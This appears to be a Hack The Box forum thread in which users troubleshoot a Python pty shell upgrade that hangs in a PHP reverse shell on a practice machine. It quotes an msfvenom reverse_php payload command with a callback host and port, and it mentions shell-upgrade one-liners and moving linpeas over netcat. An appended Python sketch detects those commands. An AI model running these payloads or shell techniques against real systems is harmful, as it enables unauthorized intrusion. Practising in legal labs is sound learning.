Python pty.spawn not working

Yea I was already certain I had run it both ways just to make sure, but I just went and checked again, copy and pasted your command, and still nothing. My shell doesn’t exit necessarily, just seems to kind of hang

Ok - that is a little bit odd.

For clarity, when you run python -c import pty; pty.spawn("/bin/sh") it should hang because all you’ve done is run python -c import pty and then tried to issue a python command to the shell interpreter.

However if you have enclosed the whole string, it should be treated as a blob to pass to python. This doesn’t always work (I find “shell upgrades” break often enough that I only do them if I really, really need to), but I get you are following a walkthrough where it is used, so it should work unless something on the box has changed since then.

Try it with a bash shell to see if that makes a difference.

I was using a bash shell, but I tried both for the sake of being thorough. I’m not even following the walkthrough necessarily in order to exploit the machine. The only reason I pulled it up in the first place was because my shell upgrade wasn’t working and I wanted to double check that I wasn’t doing anything wrong. However we both get a shell via nc, and running the code on the machine, then his upgrade works and mine doesn’t. So I’m just at a loss.

Again I’m new, this is the msfvenom command I’m using,
msfvenom -p php/reverse_php LHOST=10.10.14.54 LPORT=1234 -f raw > shell2.htb

any red flags there?

EDIT: I guess I should mention the .htb extension is being run as .php by the server. Not sure if you would know/remember that if you maybe haven’t done the box before or in a while since you’re more advanced than I am

What is the machine?

I’ve had trouble with msf PHP shells before where I couldn’t run certain interactive commands. I try to stay away from them when I can. It’s been a while though since I’ve seen this.
You could try getting a shell through another method (e.g. a simple php webshell and then running a reverse shell one-liner as the command).

@TazWake said:
What is the machine?

I just try to run following on the foothold of Magic, not working.
python3 -c 'import pty; pty.spawn("/bin/sh")'

@6uta said:

I just try to run following on the foothold of Magic, not working.
python3 -c 'import pty; pty.spawn("/bin/sh")'

Hey. The command is right.
Try socat interactive shell, if python/python3 is not present.
But I’m sure your command is right.

What response exactly do you get after executing the python pty script?

@zaicurity said:

I’ve had trouble with msf PHP shells before where I couldn’t run certain interactive commands. I try to stay away from them when I can. It’s been a while though since I’ve seen this.
You could try getting a shell through another method (e.g. a simple php webshell and then running a reverse shell one-liner as the command).

Maybe because I don’t know it well enough, but I never understood the fuss of metasploit: it’s confusing that it’s like a shell but not really and if you get used to it: on any half decent windows machine the av will pick it up and throw you out.
Never even thought of using it. I just don’t like to use stuff that I don’t know what it’s doing exactly… The benefits I know of don’t compare to all the downsides I experienced with it.

That being said: @6uta, you generated a meterpreter payload, and you try to upgrade that session to one with auto complete. That it?

Not sure if meterpreter can. My suggestion would be to stay away from meterpreter sessions whenever you have a choice.

@6uta said:

I just try to run following on the foothold of Magic, not working.
python3 -c 'import pty; pty.spawn("/bin/sh")'

That should work on Magic. When you say it is “not working” , what actually happens? Does nothing happen or do you get an error message?

@gnothiseauton

Maybe because I don’t know it well enough, but I never understood the fuss of metasploit:

I agree. Sometimes it can make life easier but all too often the varying payloads just confuse people. People expect everything to be a meterpreter shell but it rarely works that way.

If you need a shell that can use su or sudo, you can use /usr/bin/script -qc /bin/bash /dev/null on any linux box as far as I know. It won’t give you tab complete or command history, though.

@TazWake agreed man.

@TazWake said:

@6uta said:

I just try to run following on the foothold of Magic, not working.
python3 -c 'import pty; pty.spawn("/bin/sh")'

That should work on Magic. When you say it is “not working” , what actually happens? Does nothing happen or do you get an error message?

Sorry to not describe clearly.
The php reverse shell becomes unresponsive once I sent: python -c "import pty; pty.spawn('/bin/bash');"
But everything is working fine if I use perl reverse shell.

@6uta said:

Sorry to not describe clearly.
The php reverse shell becomes unresponsive once I sent: python -c "import pty; pty.spawn('/bin/bash');"
But everything is working fine if I use perl reverse shell.

Glad to hear you’ve got a solution, even if it is far from ideal.

I’ve just tried on Magic and this worked python3 -c 'import pty; pty.spawn("/bin/bash")' but I can’t see why using the double/single quotes the other way round should make a difference.

I’m having the same issue. But in my case, it closes out my reverse connection and knocks me to my host machine terminal.

Here is the output -

What will be a solution for this? @TazWake

I am not sure. Does this happen every time you try it? How long can you keep a shell if you don’t try to upgrade it?

You don’t actually need an upgraded shell on the box you are looking at there.

As an alternative, you could try using Metasploit as that definitely works with the shell upgrade you’ve tried.

But, realistically, other than a more attractive path shown on the command line, there isn’t a huge advantage to doing this.

. Sorry this was mistake comment.

@dbstart09, it kind of looks like instead of using a single quote, you used the tick mark under the tilde. If it is in fact a single quote, then I’m not sure why it’s not working for you.

Thanks, @TazWake and @marlasthemage now I got the shell as tomcat.

But now a new problem is what to do next. Whenever I go each directory only has read-only permissions. Try to download linpeas but getting this “Could not resolve the hostname: github.com”.

Eventually, tried Netcat listener on tomcat shell and sent linpeas from my local machine. Now I can’t run it. With sudo it asks for the password for tomcat and I put what I have but no use at all.

Any hint on what to try next?

TIA

@dbstart09 said:

Thanks, @TazWake and @marlasthemage now I got the shell as tomcat.

But now a new problem is what to do next. Whenever I go each directory only has read-only permissions. Try to download linpeas but getting this “Could not resolve the hostname: github.com”.

Eventually, tried Netcat listener on tomcat shell and sent linpeas from my local machine. Now I can’t run it. With sudo it asks for the password for tomcat and I put what I have but no use at all.

Any hint on what to try next?

You will get better answers if you ask this on the thread for the specific box.

Most HTB boxes will prevent you accessing internet resources. You need to download to your machine and then upload to the box.

If things are read-only, you can still read them.
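
Added example, not part of the thread or any poster's code: seen from the defender's side, the shell-upgrade commands quoted in this thread (python -c with pty.spawn, and script -qc /bin/bash /dev/null) show up in process command-line telemetry. This sketch matches them over constructed sample command lines; the rule names, function names and samples are assumptions made for illustration.

```python
import re
import shlex

PY_RE = re.compile(r"(?:^|/)python[\d.]*$")
SHELL_RE = re.compile(r"(?:^|/)(?:ba|da|z|k)?sh$")
# pty.spawn("/bin/sh") or pty.spawn(["/bin/sh"]); group 1 is the spawned program
SPAWN_RE = re.compile(r"\bpty\s*\.\s*spawn\s*\(\s*\[?\s*[\"']([^\"']+)[\"']")
OPT_C_RE = re.compile(r"-[A-Za-z]*c")  # -c alone or bundled, e.g. -qc

def classify(argv):
    """Return (rule, program) if argv looks like a PTY shell upgrade, else None."""
    if len(argv) < 3:
        return None
    exe, pairs = argv[0], list(zip(argv[1:], argv[2:]))
    if PY_RE.search(exe):
        for flag, code in pairs:
            m = SPAWN_RE.search(code) if flag == "-c" else None
            if m:
                return ("python-pty-spawn", m.group(1))
    elif exe.rsplit("/", 1)[-1] == "script" and "/dev/null" in argv:
        # script with the typescript discarded and a shell as the -c command
        for flag, cmd in pairs:
            words = cmd.split()
            if OPT_C_RE.fullmatch(flag) and words and SHELL_RE.search(words[0]):
                return ("script-pty-shell", words[0])
    return None

def scan(cmdlines):
    """Classify shell-style command lines; returns [(cmdline, hit), ...] for hits."""
    hits = []
    for line in cmdlines:
        hit = classify(shlex.split(line))
        if hit:
            hits.append((line, hit))
    return hits

# Constructed sample telemetry (not taken from any host in the thread).
SAMPLES = [
    "python3 -c 'import pty; pty.spawn(\"/bin/sh\")'",
    "python -c \"import pty; pty.spawn('/bin/bash');\"",
    "/usr/bin/script -qc /bin/bash /dev/null",
    "python3 -c 'import sys; print(sys.version)'",
    "script -q session.log",
    "python -c import pty",  # argv left when an unquoted -c string is split at ';'
]

if __name__ == "__main__":
    for line, (rule, prog) in scan(SAMPLES):
        print(f"{rule:18} {prog:10} {line}")
```

Both quote orders discussed in the thread produce the same argv once the shell has parsed them, which is why the rule inspects the -c argument rather than the raw command string.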